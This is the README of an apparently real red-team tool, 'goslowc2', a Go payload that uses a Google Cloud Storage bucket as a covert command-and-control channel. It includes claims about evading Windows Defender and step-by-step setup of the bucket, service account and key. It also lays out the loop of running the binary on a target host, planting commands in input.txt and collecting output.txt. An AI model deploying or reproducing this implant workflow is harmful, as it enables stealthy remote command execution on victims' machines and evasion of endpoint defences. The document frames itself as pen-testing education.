A demonstration of using GoLang and GCP Storage for a quick and easy evasion payload.
For a walkthrough of using this solution, please visit the accompanying post: Red Team Payload with Go and GCP
- GoLang is not as widely supported by reverse engineering tools without plugins or some tuning, which also suggests that EDR platforms haven't caught up as much either
- GoLang gives you the memory handling and type handling convenience of a scripting language with the performance of a compiled language, because you can simply 'go build foo.go'
- The Google Cloud Platform (GCP) Storage SDK handles authentication automatically, talks to TLS v1.2 secured endpoints, and gives you a scratch pad for input and output, which makes asynchronous communication easy
- Running GoLang os.exec and the syscall.call methods with C-style unsafe (non type-cast) unsigned integer pointers gave interesting results against the Windows 10/11 Defender defaults (Q4 2022) for the 'evasion' shell and additional payload routines, versus C running the system method, which immediately triggers a backdoor alert and cloud scan
- General grudge: the Google SOC sent me a nastygram about my C payload stored in my personal Google Drive account. GoLang was made by Google developers, so I wanted to make it ironic, because this would have been so much easier using a packer + python3.
- Maybe you don't have access to the standard MSF multi/handler in a pen test?
This module demonstrates using os.exec to wrap and execute another Go script or binary as a subprocess. That can easily trigger an IOC, but it also allows (with some modification) easy ingestion of the running input.txt through straight GoLang WinAPI syscalls for future "evasion" considerations. I also included notes about some strange behaviors found when using user32.dll MessageBoxA.
go mod init goslowc2/main
go get cloud.google.com/go/storage
go build goslowc2
gsutil mb gs://BUCKET_NAME
gcloud iam service-accounts create SA_NAME \
--description="DESCRIPTION" \
--display-name="DISPLAY_NAME"
gcloud projects add-iam-policy-binding PROJECT_ID \
--member="serviceAccount:SA_NAME@PROJECT_ID.iam.gserviceaccount.com" \
--role="ROLE_NAME"
For the CLI you need to create a YAML file describing the permissions to bind to a role
title: goslow-role
description: foo
stage: GA
includedPermissions:
- storage.objects.create
- storage.objects.get
Create the role at the project level
gcloud iam roles create role-id --project=project-id \
--file=yaml-file-path
Bind the role to the service account
gcloud iam service-accounts add-iam-policy-binding \
SA_NAME@PROJECT_ID.iam.gserviceaccount.com \
--member="user:USER_EMAIL" \
--role="roles/iam.serviceAccountUser"
Create a JSON key, download it, and keep it in the same directory that goslowc2 runs from
gcloud iam service-accounts keys create KEY_FILE \
--iam-account=SA_NAME@PROJECT_ID.iam.gserviceaccount.com
- Create an input.txt in the root namespace of your bucket containing a single command such as "whoami" or "dir"
- Run goslowc2.exe on targethost
- Wait for the output.txt to show up in your bucket in the same root namespace
- gsutil cp gs://YOURBUCKET/*.txt ./
- cat ./output.txt
- echo "whoami" > input.txt
- gsutil cp ./input.txt gs://YOURBUCKET
IMPORTANT: Be sure to modify any variables in the code before building, as the initial values are for demo purposes only
cp <yourserviceaccountkey.json> ./
go build goslowc2.go
goslowc2.exe #this is going to be your payload running on target host
DISCLAIMER: The author is NOT responsible for misuse or abuse of this educational source.
// goslowc2 is a demo payload execution for using a GCP Storage bucket and objects as the C2 mechanism. At the time of development (Q4 2022) Windows Defender did not trigger on the os.exec method unless functions were stripped at build time
// For a stealthier payload, consider the complementary approach of direct WinAPI syscalls converting to unsigned integer pointers
// Author: Dennis Chow dchow[AT]xtecsystems.com 11/20/2022
// Requirements: GCP storage bucket and service account credential foo.json in the same runtime directory
// Confirmed working on GoLang 1.18.4 and GCP Storage SDK 1.28.0